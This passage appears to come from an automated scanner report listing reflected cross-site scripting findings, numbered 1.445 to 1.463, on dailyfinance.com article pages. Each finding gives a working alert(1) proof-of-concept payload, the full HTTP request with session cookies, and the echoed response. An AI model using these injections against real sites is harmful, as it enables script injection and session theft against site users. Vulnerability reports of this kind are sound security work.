GET /story/investing/why-global-food-price-inflation-really-matters/19827378/?7b125"-alert(1)-"66d1000cc3d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.445. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69239"><script>alert(1)</script>a06145a9627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/why-global-food-price-inflation-really-matters/19827378/?69239"><script>alert(1)</script>a06145a9627=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/?69239"><script>alert(1)</script>a06145a9627=1" rel="nofollow"> ...[SNIP]...
1.446. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc1b7"-alert(1)-"58bdbb7ac83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?dc1b7"-alert(1)-"58bdbb7ac83=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.447. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3284"><script>alert(1)</script>d8208c49c1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?d3284"><script>alert(1)</script>d8208c49c1a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?d3284"><script>alert(1)</script>d8208c49c1a=1" rel="nofollow"> ...[SNIP]...
1.448. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8764"><script>alert(1)</script>1ec4760cdf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?a8764"><script>alert(1)</script>1ec4760cdf5=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?a8764"><script>alert(1)</script>1ec4760cdf5=1" rel="nofollow"> ...[SNIP]...
1.449. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f867d"-alert(1)-"e457b2427c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?f867d"-alert(1)-"e457b2427c2=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEle ...[SNIP]...
1.450. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1c0"><script>alert(1)</script>8d6e76d181d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?6b1c0"><script>alert(1)</script>8d6e76d181d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?6b1c0"><script>alert(1)</script>8d6e76d181d=1" rel="nofollow"> ...[SNIP]...
1.451. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32993"-alert(1)-"9e4339663f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?32993"-alert(1)-"9e4339663f3=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.452. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fd2"><script>alert(1)</script>1ce12f3df08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/sesame-street-coming-to-new-childrens-museum/19828110/?77fd2"><script>alert(1)</script>1ce12f3df08=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/?77fd2"><script>alert(1)</script>1ce12f3df08=1" rel="nofollow"> ...[SNIP]...
1.453. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa317"-alert(1)-"5702f94f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/sesame-street-coming-to-new-childrens-museum/19828110/?aa317"-alert(1)-"5702f94f651=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEle ...[SNIP]...
1.454. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 564ee"-alert(1)-"07737124683 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?564ee"-alert(1)-"07737124683=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.455. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fca6"><script>alert(1)</script>3b4771bb453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?5fca6"><script>alert(1)</script>3b4771bb453=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?5fca6"><script>alert(1)</script>3b4771bb453=1" rel="nofollow"> ...[SNIP]...
1.456. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fdf"><script>alert(1)</script>858158d5057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?d1fdf"><script>alert(1)</script>858158d5057=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?d1fdf"><script>alert(1)</script>858158d5057=1" rel="nofollow"> ...[SNIP]...
1.457. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f56b"-alert(1)-"1ce74119c8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?3f56b"-alert(1)-"1ce74119c8a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.458. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d2"><script>alert(1)</script>4e9fd2527f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?665d2"><script>alert(1)</script>4e9fd2527f=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?665d2"><script>alert(1)</script>4e9fd2527f=1" rel="nofollow"> ...[SNIP]...
1.459. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b0d"-alert(1)-"4419770cc27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?a5b0d"-alert(1)-"4419770cc27=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.460. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc2b"><script>alert(1)</script>03ffb7a18e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?bdc2b"><script>alert(1)</script>03ffb7a18e1=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?bdc2b"><script>alert(1)</script>03ffb7a18e1=1" rel="nofollow"> ...[SNIP]...
1.461. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 260de"-alert(1)-"468c282cff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?260de"-alert(1)-"468c282cff4=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.462. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3f10"-alert(1)-"7e4146b3b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/?c3f10"-alert(1)-"7e4146b3b1b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.463. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc17"><script>alert(1)</script>e301719d8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/?1cc17"><script>alert(1)</script>e301719d8f9=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
